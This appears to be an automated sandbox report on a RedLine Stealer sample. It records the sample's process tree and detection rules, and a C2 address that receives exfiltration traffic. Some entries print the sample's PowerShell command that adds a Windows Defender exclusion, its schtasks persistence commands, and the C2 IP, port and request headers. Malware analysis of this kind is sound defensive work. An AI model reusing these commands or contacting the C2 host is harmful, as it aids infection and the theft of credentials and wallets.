Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PzPxqbK89H.exe

Overview

General Information

Sample name:PzPxqbK89H.exe
renamed because original name is a hash value
Original sample name:a3dd5c4c73ed04342cb2319ff7cfc714.exe
Analysis ID:1502194
MD5:a3dd5c4c73ed04342cb2319ff7cfc714
SHA1:d92d54d5085cdacaeebd568c35d066566bc906cf
SHA256:db6a579ef546405d1c3e44a5f1637bc402136315ce4814d53aa926056f680128
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PzPxqbK89H.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\PzPxqbK89H.exe" MD5: A3DD5C4C73ED04342CB2319FF7CFC714)
    • powershell.exe (PID: 7520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PzPxqbK89H.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7988 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7604 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpBC1E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PzPxqbK89H.exe (PID: 7792 cmdline: "C:\Users\user\Desktop\PzPxqbK89H.exe" MD5: A3DD5C4C73ED04342CB2319FF7CFC714)
      • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • VzwumYUBCtHW.exe (PID: 7932 cmdline: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe MD5: A3DD5C4C73ED04342CB2319FF7CFC714)
    • schtasks.exe (PID: 8160 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpE438.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • VzwumYUBCtHW.exe (PID: 3548 cmdline: "C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe" MD5: A3DD5C4C73ED04342CB2319FF7CFC714)
      • conhost.exe (PID: 2840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["45.137.22.239:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000A.00000002.1839480666.000000000358E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000A.00000002.1839480666.000000000358E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0000000A.00000002.1839480666.000000000358E000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x13c2a:$a4: get_ScannedWallets
          • 0x12a88:$a5: get_ScanTelegram
          • 0x138ae:$a6: get_ScanGeckoBrowsersPaths
          • 0x116ca:$a7: <Processes>k__BackingField
          • 0xf5dc:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x10ffe:$a9: <ScanFTP>k__BackingField
          00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 20 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.PzPxqbK89H.exe.4429990.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.PzPxqbK89H.exe.4429990.3.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.2.PzPxqbK89H.exe.4429990.3.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x117ca:$a4: get_ScannedWallets
                  • 0x10628:$a5: get_ScanTelegram
                  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
                  • 0xf26a:$a7: <Processes>k__BackingField
                  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0xeb9e:$a9: <ScanFTP>k__BackingField
                  0.2.PzPxqbK89H.exe.4429990.3.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0xe68a:$u7: RunPE
                  • 0x11d41:$u8: DownloadAndEx
                  • 0x7330:$pat14: , CommandLine:
                  • 0x11279:$v2_1: ListOfProcesses
                  • 0xe88b:$v2_2: get_ScanVPN
                  • 0xe92e:$v2_2: get_ScanFTP
                  • 0xf61e:$v2_2: get_ScanDiscord
                  • 0x1060c:$v2_2: get_ScanSteam
                  • 0x10628:$v2_2: get_ScanTelegram
                  • 0x106ce:$v2_2: get_ScanScreen
                  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x11709:$v2_2: get_ScanBrowsers
                  • 0x117ca:$v2_2: get_ScannedWallets
                  • 0x117f0:$v2_2: get_ScanWallets
                  • 0x11810:$v2_3: GetArguments
                  • 0xfed9:$v2_4: VerifyUpdate
                  • 0x147ea:$v2_4: VerifyUpdate
                  • 0x11bca:$v2_5: VerifyScanRequest
                  • 0x112c6:$v2_6: GetUpdates
                  • 0x147cb:$v2_6: GetUpdates
                  0.2.PzPxqbK89H.exe.44417b0.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 15 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PzPxqbK89H.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PzPxqbK89H.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PzPxqbK89H.exe", ParentImage: C:\Users\user\Desktop\PzPxqbK89H.exe, ParentProcessId: 7260, ParentProcessName: PzPxqbK89H.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PzPxqbK89H.exe", ProcessId: 7520, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PzPxqbK89H.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PzPxqbK89H.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PzPxqbK89H.exe", ParentImage: C:\Users\user\Desktop\PzPxqbK89H.exe, ParentProcessId: 7260, ParentProcessName: PzPxqbK89H.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PzPxqbK89H.exe", ProcessId: 7520, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpE438.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpE438.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe, ParentImage: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe, ParentProcessId: 7932, ParentProcessName: VzwumYUBCtHW.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpE438.tmp", ProcessId: 8160, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpBC1E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpBC1E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PzPxqbK89H.exe", ParentImage: C:\Users\user\Desktop\PzPxqbK89H.exe, ParentProcessId: 7260, ParentProcessName: PzPxqbK89H.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpBC1E.tmp", ProcessId: 7604, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PzPxqbK89H.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PzPxqbK89H.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PzPxqbK89H.exe", ParentImage: C:\Users\user\Desktop\PzPxqbK89H.exe, ParentProcessId: 7260, ParentProcessName: PzPxqbK89H.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PzPxqbK89H.exe", ProcessId: 7520, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpBC1E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpBC1E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PzPxqbK89H.exe", ParentImage: C:\Users\user\Desktop\PzPxqbK89H.exe, ParentProcessId: 7260, ParentProcessName: PzPxqbK89H.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpBC1E.tmp", ProcessId: 7604, ProcessName: schtasks.exe

                    Suricata Signatures

                    Timestamp:2024-08-31T14:42:11.686365+0200
                    SID:2045001
                    Severity:1
                    Source Port:55615
                    Destination Port:49737
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-31T14:42:11.686365+0200
                    SID:2046056
                    Severity:1
                    Source Port:55615
                    Destination Port:49737
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-08-31T14:42:13.133954+0200
                    SID:2849662
                    Severity:1
                    Source Port:49741
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-31T14:42:08.741210+0200
                    SID:2849351
                    Severity:1
                    Source Port:49737
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-31T14:42:20.668966+0200
                    SID:2045001
                    Severity:1
                    Source Port:55615
                    Destination Port:49741
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-31T14:42:20.668966+0200
                    SID:2046056
                    Severity:1
                    Source Port:55615
                    Destination Port:49741
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-08-31T14:42:08.144478+0200
                    SID:2045000
                    Severity:1
                    Source Port:55615
                    Destination Port:49737
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-31T14:42:03.067237+0200
                    SID:2849662
                    Severity:1
                    Source Port:49737
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-31T14:42:18.349785+0200
                    SID:2849351
                    Severity:1
                    Source Port:49741
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-31T14:42:13.449416+0200
                    SID:2848200
                    Severity:1
                    Source Port:49739
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-31T14:42:12.092624+0200
                    SID:2849352
                    Severity:1
                    Source Port:49739
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-31T14:42:18.157464+0200
                    SID:2045000
                    Severity:1
                    Source Port:55615
                    Destination Port:49741
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-31T14:42:20.995187+0200
                    SID:2849352
                    Severity:1
                    Source Port:49748
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-08-31T14:42:22.560834+0200
                    SID:2848200
                    Severity:1
                    Source Port:49749
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: PzPxqbK89H.exeAvira: detected
                    Found malware configuration
                    Source: 0.2.PzPxqbK89H.exe.4429990.3.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["45.137.22.239:55615"], "Bot Id": "cheat"}
                    Multi AV Scanner detection for domain / URL
                    Source: http://45.137.22.239:55615/Virustotal: Detection: 11%Perma Link
                    Source: 45.137.22.239:55615Virustotal: Detection: 11%Perma Link
                    Source: http://45.137.22.239:55615Virustotal: Detection: 11%Perma Link
                    Source: http://45.137.22.239:5Virustotal: Detection: 11%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeVirustotal: Detection: 60%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: PzPxqbK89H.exeReversingLabs: Detection: 60%
                    Source: PzPxqbK89H.exeVirustotal: Detection: 60%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: PzPxqbK89H.exeJoe Sandbox ML: detected
                    Source: PzPxqbK89H.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: PzPxqbK89H.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49737 -> 45.137.22.239:55615
                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49741 -> 45.137.22.239:55615
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 45.137.22.239:55615 -> 192.168.2.4:49737
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49737 -> 45.137.22.239:55615
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 45.137.22.239:55615 -> 192.168.2.4:49737
                    Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 45.137.22.239:55615 -> 192.168.2.4:49737
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49739 -> 45.137.22.239:55615
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 45.137.22.239:55615 -> 192.168.2.4:49741
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49741 -> 45.137.22.239:55615
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 45.137.22.239:55615 -> 192.168.2.4:49741
                    Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 45.137.22.239:55615 -> 192.168.2.4:49741
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49748 -> 45.137.22.239:55615
                    Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49749 -> 45.137.22.239:55615
                    Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49739 -> 45.137.22.239:55615
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 45.137.22.239:55615
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49749
                    Source: global trafficTCP traffic: 192.168.2.4:49737 -> 45.137.22.239:55615
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.239:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 45.137.22.239:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 45.137.22.239:55615Content-Length: 957268Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.239:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 45.137.22.239:55615Content-Length: 957260Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 45.137.22.239:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 45.137.22.239:55615Content-Length: 956866Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 45.137.22.239:55615Content-Length: 956858Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 45.137.22.239 45.137.22.239
                    Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.239
